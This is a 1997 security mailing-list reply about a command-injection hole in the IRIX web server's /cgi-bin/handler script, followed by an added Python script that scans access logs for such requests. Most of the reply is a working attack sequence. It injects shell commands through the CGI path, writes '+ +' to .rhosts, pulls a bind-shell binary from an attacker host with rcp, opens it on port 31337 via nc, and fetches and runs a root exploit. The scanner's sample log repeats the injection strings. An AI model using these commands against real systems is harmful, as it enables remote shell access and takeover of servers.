Re: CPSR 7: IRIX WWW Server
Aaron Bornstein (aaronb at j51.com)
Thu, 24 Jul 1997 12:59:54 -0400
- In reply to: Thomas Walter: "Re: CPSR 7: IRIX WWW Server"
On Thu, 24 Jul 1997, Thomas Walter wrote:
[snip]
> enemy% telnet victim 80
> Trying 1.2.3.4...
> Connected to victim.
> Escape character is '^]'.
> GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e
> /bin/csh|?data=Download
> UX:sh (sh): ERROR: Connection closed by foreign host.
> enemy%
>
> And voila! - What else do you want? Any other programs to start? Just
> try...
>
Keep in mind that it isn't necessary to get everything done in one
command. A string of two or three commands might sometimes be necessary
to get things moving. For example:
enemy% whoami
evil_cracker
enemy% echo + + > .rhosts
enemy% nc victim.com 80
GET /cgi-bin/handler/;/usr/bsd/rcp evil_cracker
enemy.com:portshell /tmp|?data=Download
enemy% nc victim.com 80
GET /cgi-bin/handler/;/tmp/portshell 31337|?data=Download
enemy% nc victim.com 31337
% whoami
nobody
% rcp evil_cracker
enemy.com:irix_root_bug_of_the_week.sh \
./irbotw.sh ; ./irbotw.sh
#
[... or whatever ...]
"portshell" being a program that bound itself to a TCP port and executed a
shell upon receiving a connection. Boom, shell access obtained under
whatever uid httpd is running as. Or, one could even create a dummy
inetd.conf and run their own copy of inetd. The possibilities are
virtually limitless.
--Aaron
- -- --- ---- - Aaron Bornstein : aaronb at j51 dot com - ---- --- -- -
Never let your schooling interfere with your education
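
A defensive counterpart to the requests quoted in this thread, as an added example that is not part of the original message: a Python script that scans Common Log Format access logs for requests to /cgi-bin/handler whose path info contains shell metacharacters, raw or percent-encoded. The log lines, client addresses, timestamps and the benign report.txt request are constructed for illustration; the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*)" (?:\d{3}|-) \S+$')
# Characters the shell treats as separators, pipes, substitution or redirection.
SHELL_META = re.compile(r'[;|&`$<>\r\n]')
CGI_PREFIX = "/cgi-bin/handler"  # the script named in the thread

def request_target(request):
    """Target of a request line; tolerates raw spaces and a missing HTTP version."""
    _, _, target = request.partition(" ")
    return re.sub(r" HTTP/\d\.\d$", "", target)

def path_info(target):
    """Decoded text between the CGI name and '?', or None if not this CGI."""
    raw_path = target.split("?", 1)[0]
    decoded = unquote(unquote(raw_path))  # twice, to catch double encoding
    if not decoded.startswith(CGI_PREFIX):
        return None
    rest = decoded[len(CGI_PREFIX):]
    return rest if rest == "" or rest.startswith("/") else None

def scan(lines):
    """Return (client, timestamp, metacharacters) for each flagged request."""
    hits = []
    for line in lines:
        m = CLF.match(line.rstrip("\n"))
        if not m:
            continue
        info = path_info(request_target(m.group(3)))
        if info is None:
            continue
        found = sorted(set(SHELL_META.findall(info)))
        if found:
            hits.append((m.group(1), m.group(2), found))
    return hits

# Constructed sample log (documentation addresses, invented timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jul/1997:12:40:01 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.10 - - [24/Jul/1997:12:41:07 -0400] "GET /cgi-bin/handler/;/usr/sbin/xwsh -display enemy:0 -e /bin/csh|?data=Download" 200 0',
    '192.0.2.77 - - [24/Jul/1997:12:45:30 -0400] "GET /cgi-bin/handler/%3B/tmp/portshell%2031337%7C?data=Download HTTP/1.0" 200 0',
    '192.0.2.5 - - [24/Jul/1997:12:50:12 -0400] "GET /cgi-bin/handler/report.txt?data=Download HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Only the path info before the "?" is inspected, which is where the requests in this thread carry their commands; query strings legitimately contain "&" and would need a separate rule.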